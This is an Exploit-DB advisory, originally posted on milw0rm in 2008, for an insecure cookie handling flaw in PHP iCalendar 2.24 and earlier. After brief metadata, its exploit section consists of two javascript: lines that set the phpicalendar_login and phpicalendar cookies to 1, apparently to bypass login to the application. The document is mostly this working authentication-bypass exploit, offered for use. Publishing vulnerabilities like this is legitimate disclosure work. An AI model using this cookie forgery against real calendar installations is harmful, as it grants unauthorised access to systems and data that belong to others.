PHP iCalendar 2.24 - Insecure Cookie Handling

EDB-ID:

6526


Author:

Stack

Type:

webapps


Platform:

PHP

Date:

2008-09-22


###############################################################################################
[+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability
[+] Discovered By Stack                
[+] Greetz : All my freind               
################################################################################################
---
exploit:
javascript:document.cookie = "phpicalendar_login=1; path=/";
javascript:document.cookie = "phpicalendar=1; path=/";

# milw0rm.com [2008-09-22]